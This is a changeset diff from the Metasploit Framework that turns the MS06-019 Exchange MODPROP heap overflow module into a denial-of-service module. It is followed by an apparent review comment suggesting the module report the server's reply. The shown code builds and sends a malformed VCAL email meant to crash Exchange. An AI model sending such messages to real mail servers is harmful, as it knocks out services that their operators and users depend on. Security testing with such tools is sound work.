Changeset 4836
- Timestamp:
- 05/01/07 22:34:49 (1 year ago)
- Files:
framework3/tags/framework-3.0/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb
r4831 r4836 15 15 module Msf 16 16 17 class Exploits::Windows::Smtp::MS06_019_EXCHANGE < Msf::Exploit::Remote17 class Auxiliary::Dos::Windows::Smtp::MS06_019_EXCHANGE < Msf::Auxiliary 18 18 19 19 include Exploit::Remote::Smtp … … 23 23 'Name' => 'MS06-019 Exchange MODPROP Heap Overflow', 24 24 'Description' => %q{ 25 This module exploits a heap overflow vulnerability in MS25 This module triggers a heap overflow vulnerability in MS 26 26 Exchange that occurs when multiple malformed MODPROP values 27 27 occur in a VCAL request. … … 37 37 38 38 ], 39 'Privileged' => true, 40 'DefaultOptions' => 41 { 42 'EXITFUNC' => 'thread', 43 'SUBJECT' => 're: Your Brains', 44 }, 45 'Payload' => 46 { 47 'Space' => 614, # XXX 48 'EncoderOptions' => 49 { 50 'BufferRegister' => 'EDX', 51 } 52 }, 53 'Platform' => 'win', 54 'Targets' => 55 [ 56 # alphanum rets :(, will look more into it later 57 ['Windows 2003 SP0 English', { 'Platform' => 'win', 'Ret' => 0x77364650 }], 58 ], 59 'DisclosureDate' => 'Nov 12 2004', 60 'DefaultTarget' => 0)) 39 'DisclosureDate' => 'Nov 12 2004')) 40 41 register_options( 42 [ 43 OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains']) 44 ], self.class) 45 61 46 end 62 47 63 def exploit 64 print "Connected; Sending mail... " 48 # 49 # This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class 50 # 51 def run 52 53 connect_login 65 54 66 55 modprops = ['attendee', 'categories', 'class', 'created', 'description', … … 69 58 'status', 'summary', 'transp', 'uid'] 70 59 71 #modprops = ['dtstamp']60 #modprops = ['dtstamp'] 72 61 73 62 modpropshort = "" … … 89 78 } 90 79 91 boundry = rand_text_alphanumeric(8) + "." + rand_text_alphanumeric(8)80 boundry = rand_text_alphanumeric(8) + "." 
+ rand_text_alphanumeric(8) 92 81 93 82 … … 95 84 # reliable, and gives crashes in better spots of you use these modprops: 96 85 97 modpropshort ="dtstamp,"98 modproplong ="dtstamp, dtstamp,"99 modpropbusted = "DTSTAMP:\r\n"86 modpropshort = "dtstamp," 87 modproplong = "dtstamp, dtstamp," 88 modpropbusted = "DTSTAMP:\r\n" 100 89 101 90 mail = "From: #{datastore['MAILFROM']}\r\n" … … 123 112 mail << "\r\n--#{boundry}\r\n" 124 113 mail << "\r\n.\r\n" 114 125 115 126 print "\n\n" + mail + "\n\n" 127 128 handler 129 connect_login 116 print_status("Sending message...") 130 117 sock.put(mail) 131 118 sock.put("QUIT\r\n")
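Review bot: The new `run` body writes the message and then `QUIT` back-to-back (`sock.put(mail)` / `sock.put("QUIT\r\n")`) without reading the server's reply, so the operator is never told whether the SMTP server accepted the message or dropped the connection, which is the only observable outcome of a DoS check. Reading the response with a bounded timeout before quitting and reporting it, e.g. `res = sock.get_once(-1, 5)` followed by `print_status("Server replied: #{res.strip}") if res`, would make the module's result visible; the body of `run` continues past the end of this hunk, so disconnect/error handling may already live there. The new header comment refers to `Re::MIME`, which looks like a typo for the `Rex::MIME` class the same sentence means to point at; suggest `# This needs some reworking to use the SMTPDeliver mixin and the Rex::MIME class`.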
